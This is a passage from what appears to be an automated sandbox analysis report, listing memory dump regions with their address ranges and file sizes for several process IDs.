            Filesize

            7.5MB

          • memory/1676-89-0x0000000002310000-0x0000000002F5A000-memory.dmp
            Filesize

            12.3MB

          • memory/1676-84-0x0000000000000000-mapping.dmp
          • memory/1676-175-0x0000000140000000-0x0000000140786000-memory.dmp
            Filesize

            7.5MB

          • memory/1676-176-0x00000000000E0000-0x0000000000100000-memory.dmp
            Filesize

            128KB

          • memory/1676-174-0x000000014030F3F8-mapping.dmp
          • memory/1676-172-0x0000000140000000-0x0000000140786000-memory.dmp
            Filesize

            7.5MB

          • memory/1676-157-0x0000000140000000-0x0000000140786000-memory.dmp
            Filesize

            7.5MB

          • memory/1676-158-0x0000000140000000-0x0000000140786000-memory.dmp
            Filesize

            7.5MB

          • memory/1676-159-0x0000000140000000-0x0000000140786000-memory.dmp
            Filesize

            7.5MB

          • memory/1676-160-0x0000000140000000-0x0000000140786000-memory.dmp
            Filesize

            7.5MB

          • memory/1676-161-0x0000000140000000-0x0000000140786000-memory.dmp
            Filesize

            7.5MB

          • memory/1676-171-0x0000000140000000-0x0000000140786000-memory.dmp
            Filesize

            7.5MB

          • memory/1676-162-0x0000000140000000-0x0000000140786000-memory.dmp
            Filesize

            7.5MB

          • memory/1676-170-0x0000000140000000-0x0000000140786000-memory.dmp
            Filesize

            7.5MB

          • memory/1676-169-0x0000000140000000-0x0000000140786000-memory.dmp
            Filesize

            7.5MB

          • memory/1676-88-0x0000000002310000-0x0000000002F5A000-memory.dmp
            Filesize

            12.3MB

          • memory/1676-168-0x0000000140000000-0x0000000140786000-memory.dmp
            Filesize

            7.5MB

          • memory/1688-141-0x0000000000000000-mapping.dmp
          • memory/1696-124-0x0000000000000000-mapping.dmp
          • memory/1724-81-0x00000000003F0000-0x00000000003F1000-memory.dmp
            Filesize

            4KB

          • memory/1724-83-0x00000000003F2000-0x00000000003F4000-memory.dmp
            Filesize

            8KB

          • memory/1724-82-0x00000000003F1000-0x00000000003F2000-memory.dmp
            Filesize

            4KB

          • memory/1724-69-0x0000000000000000-mapping.dmp
          • memory/1736-147-0x000000001B0F2000-0x000000001B0F4000-memory.dmp
            Filesize

            8KB

          • memory/1736-148-0x000000001B0F4000-0x000000001B0F6000-memory.dmp
            Filesize

            8KB

          • memory/1736-150-0x000000001B0F7000-0x000000001B0F8000-memory.dmp
            Filesize

            4KB

          • memory/1736-149-0x000000001B0F6000-0x000000001B0F7000-memory.dmp
            Filesize

            4KB

          • memory/1744-122-0x0000000000000000-mapping.dmp
          • memory/1788-78-0x0000000000000000-mapping.dmp
          • memory/1828-67-0x0000000000000000-mapping.dmp
          • memory/1828-133-0x0000000000000000-mapping.dmp
          • memory/1928-113-0x0000000000000000-mapping.dmp
          • memory/1980-112-0x0000000000000000-mapping.dmp